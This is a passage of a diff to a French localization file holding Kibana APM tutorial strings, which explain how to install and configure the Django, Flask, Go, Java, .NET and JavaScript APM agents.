"xpack.apm.tutorial.djangoClient.configure.commands.addTracingMiddlewareComment": "Pour envoyer les indicateurs de performance, ajoutez notre intergiciel de traçage :", "xpack.apm.tutorial.djangoClient.configure.commands.allowedCharactersComment": "a-z, A-Z, 0-9, -, _ et espace", - "xpack.apm.tutorial.djangoClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.djangoClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. 
Caractères autorisés :", + "xpack.apm.tutorial.djangoClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", "xpack.apm.tutorial.djangoClient.configure.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.djangoClient.configure.commands.useIfApmServerRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.djangoClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", "xpack.apm.tutorial.djangoClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du \"SERVICE_NAME\".", "xpack.apm.tutorial.djangoClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.djangoClient.install.textPre": "Installez l'agent APM pour Python en tant que dépendance.", "xpack.apm.tutorial.djangoClient.install.title": "Installer l'agent APM", - "xpack.apm.tutorial.dotNetClient.configureAgent.textPost": "Si vous ne transférez pas une instance \"IConfiguration\" à l'agent (par ex., pour les applications non ASP.NET Core) vous pouvez également configurer l'agent par le biais de variables d'environnement. \n Consultez [the documentation]({documentationLink}) pour une utilisation avancée.", - "xpack.apm.tutorial.dotNetClient.configureAgent.title": "Exemple de fichier appsettings.json :", + "xpack.apm.tutorial.dotNetClient.configureAgent.title": "Exemple de fichier appsettings.json :", "xpack.apm.tutorial.dotNetClient.configureApplication.textPost": "La transmission d'une instance \"IConfiguration\" est facultative mais si cette opération est effectuée, l'agent lira les paramètres de configuration depuis cette instance \"IConfiguration\" (par ex. 
à partir du fichier \"appsettings.json\").", "xpack.apm.tutorial.dotNetClient.configureApplication.textPre": "Si vous utilisez ASP.NET Core avec le package \"Elastic.Apm.NetCoreAll\", appelez la méthode \"UseAllElasticApm\" dans la méthode \"Configure\" dans le fichier \"Startup.cs\".", "xpack.apm.tutorial.dotNetClient.configureApplication.title": "Ajouter l'agent à l'application", - "xpack.apm.tutorial.dotNetClient.download.textPre": "Ajoutez le(s) package(s) d'agent depuis [NuGet]({allNuGetPackagesLink}) à votre application .NET. Plusieurs packages NuGet sont disponibles pour différents cas d'utilisation. \n\nPour une application ASP.NET Core avec Entity Framework Core, téléchargez le package [Elastic.Apm.NetCoreAll]({netCoreAllApmPackageLink}). Ce package ajoutera automatiquement chaque composant d'agent à votre application. \n\n Si vous souhaitez minimiser les dépendances, vous pouvez utiliser le package [Elastic.Apm.AspNetCore]({aspNetCorePackageLink}) uniquement pour le monitoring d'ASP.NET Core ou le package [Elastic.Apm.EfCore]({efCorePackageLink}) uniquement pour le monitoring d'Entity Framework Core. \n\n Si vous souhaitez seulement utiliser l'API d'agent publique pour l'instrumentation manuelle, utilisez le package [Elastic.Apm]({elasticApmPackageLink}).", "xpack.apm.tutorial.dotNetClient.download.title": "Télécharger l'agent APM", "xpack.apm.tutorial.downloadServer.title": "Télécharger et décompresser le serveur APM", - "xpack.apm.tutorial.downloadServerRpm": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", - "xpack.apm.tutorial.downloadServerTitle": "Vous cherchez les packages 32 bits ? 
Consultez la [Download page]({downloadPageLink}).", - "xpack.apm.tutorial.editConfig.textPre": "Si vous utilisez une version sécurisée X-Pack d'Elastic Stack, vous devez spécifier les informations d'identification dans le fichier de configuration \"apm-server.yml\".", + "xpack.apm.tutorial.editConfig.textPre": "Si vous utilisez une version sécurisée X-Pack d'Elastic Stack, vous devez spécifier les informations d'identification dans le fichier de configuration \"apm-server.yml\".", "xpack.apm.tutorial.editConfig.title": "Modifier la configuration", - "xpack.apm.tutorial.elasticCloud.textPre": "Pour activer le serveur APM, accédez à [the Elastic Cloud console] (https://cloud.elastic.co/deployments/{deploymentId}/edit) et activez APM et Fleet dans la page de modification du déploiement en cliquant sur Ajouter une capacité, puis cliquez sur Enregistrer. Une fois activé, actualisez la page.", "xpack.apm.tutorial.elasticCloudInstructions.title": "Agents APM", "xpack.apm.tutorial.flaskClient.configure.commands.allowedCharactersComment": "a-z, A-Z, 0-9, -, _ et espace", "xpack.apm.tutorial.flaskClient.configure.commands.configureElasticApmComment": "ou configurer l'utilisation d'ELASTIC_APM dans les paramètres de votre application", "xpack.apm.tutorial.flaskClient.configure.commands.initializeUsingEnvironmentVariablesComment": "initialiser à l'aide des variables d'environnement", - "xpack.apm.tutorial.flaskClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.flaskClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", + "xpack.apm.tutorial.flaskClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. 
Caractères autorisés :", "xpack.apm.tutorial.flaskClient.configure.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.flaskClient.configure.commands.useIfApmServerRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.flaskClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", "xpack.apm.tutorial.flaskClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du \"SERVICE_NAME\".", "xpack.apm.tutorial.flaskClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.flaskClient.install.textPre": "Installez l'agent APM pour Python en tant que dépendance.", "xpack.apm.tutorial.flaskClient.install.title": "Installer l'agent APM", "xpack.apm.tutorial.fleet.title": "Fleet", - "xpack.apm.tutorial.goClient.configure.commands.initializeUsingEnvironmentVariablesComment": "Initialisez à l'aide des variables d'environnement :", - "xpack.apm.tutorial.goClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.goClient.configure.commands.initializeUsingEnvironmentVariablesComment": "Initialisez à l'aide des variables d'environnement :", "xpack.apm.tutorial.goClient.configure.commands.setServiceEnvironment": "Définir l'environnement de service", - "xpack.apm.tutorial.goClient.configure.commands.setServiceNameComment": "Configurez le nom de service. Caractères autorisés : # a-z, A-Z, 0-9, -, _ et espace.", + "xpack.apm.tutorial.goClient.configure.commands.setServiceNameComment": "Configurez le nom de service. 
Caractères autorisés : # a-z, A-Z, 0-9, -, _ et espace.", "xpack.apm.tutorial.goClient.configure.commands.usedExecutableNameComment": "Si ELASTIC_APM_SERVICE_NAME n'est pas spécifié, le nom de l'exécutable sera utilisé.", "xpack.apm.tutorial.goClient.configure.commands.useIfApmRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.goClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une configuration avancée.", "xpack.apm.tutorial.goClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du nom du fichier exécutable, ou de la variable d'environnement \"ELASTIC_APM_SERVICE_NAME\".", "xpack.apm.tutorial.goClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.goClient.install.textPre": "Installez les packages d'agent APM pour Go.", "xpack.apm.tutorial.goClient.install.title": "Installer l'agent APM", - "xpack.apm.tutorial.goClient.instrument.textPost": "Consultez la [documentation]({documentationLink}) pour obtenir un guide détaillé pour l'instrumentation du code source Go.", "xpack.apm.tutorial.goClient.instrument.textPre": "Pour instrumenter votre application Go, utilisez l'un des modules d'instrumentation proposés ou directement l'API de traçage.", "xpack.apm.tutorial.goClient.instrument.title": "Instrumenter votre application", "xpack.apm.tutorial.introduction": "Collectez les mesures de performance de vos applications avec Elastic APM.", - "xpack.apm.tutorial.javaClient.download.textPre": "Téléchargez le fichier jar de l'agent depuis [Maven Central]({mavenCentralLink}). 
N'ajoutez **pas** l'agent comme dépendance de votre application.", "xpack.apm.tutorial.javaClient.download.title": "Télécharger l'agent APM", - "xpack.apm.tutorial.javaClient.startApplication.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.", - "xpack.apm.tutorial.javaClient.startApplication.textPre": "Ajoutez l'indicateur \"-javaagent\" et configurez l'agent avec les propriétés du système.\n\n * Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)\n * Définir l'URL personnalisée du serveur APM (par défaut : {customApmServerUrl})\n * Définir le token secret du serveur APM\n * Définir l'environnement de service\n * Définir le package de base de votre application", "xpack.apm.tutorial.javaClient.startApplication.title": "Lancer votre application avec l'indicateur javaagent", - "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.textPre": "Le serveur APM désactive la prise en charge du RUM par défaut. Consultez la [documentation]({documentationLink}) pour obtenir des détails sur l'activation de la prise en charge du RUM. 
Lorsque vous utilisez l'intégration APM avec Fleet, le support RUM est automatiquement activé.", "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.title": "Activer la prise en charge du Real User Monitoring (monitoring des utilisateurs réels) dans le serveur APM", - "xpack.apm.tutorial.jsClient.installDependency.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.jsClient.installDependency.commands.setRequiredServiceNameComment": "Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)", + "xpack.apm.tutorial.jsClient.installDependency.commands.setRequiredServiceNameComment": "Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)", "xpack.apm.tutorial.jsClient.installDependency.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.jsClient.installDependency.commands.setServiceVersionComment": "Définir la version de service (requis pour la fonctionnalité source map)", - "xpack.apm.tutorial.jsClient.installDependency.textPost": "Les intégrations de framework, tel que React ou Angular, ont des dépendances personnalisées. 
Consultez la [integration documentation]({docLink}) pour plus d'informations.", - "xpack.apm.tutorial.jsClient.installDependency.textPre": "Vous pouvez installer l'Agent comme dépendance de votre application avec \"npm install @elastic/apm-rum --save\".\n\nVous pouvez ensuite initialiser l'agent et le configurer dans votre application de cette façon :", + "xpack.apm.tutorial.jsClient.installDependency.textPre": "Vous pouvez installer l'Agent comme dépendance de votre application avec \"npm install @elastic/apm-rum --save\".\n\nVous pouvez ensuite initialiser l'agent et le configurer dans votre application de cette façon :", "xpack.apm.tutorial.jsClient.installDependency.title": "Configurer l'agent comme dépendance", "xpack.apm.tutorial.jsClient.scriptTags.textPre": "Vous pouvez également utiliser les balises Script pour configurer l'agent. Ajoutez un indicateur \"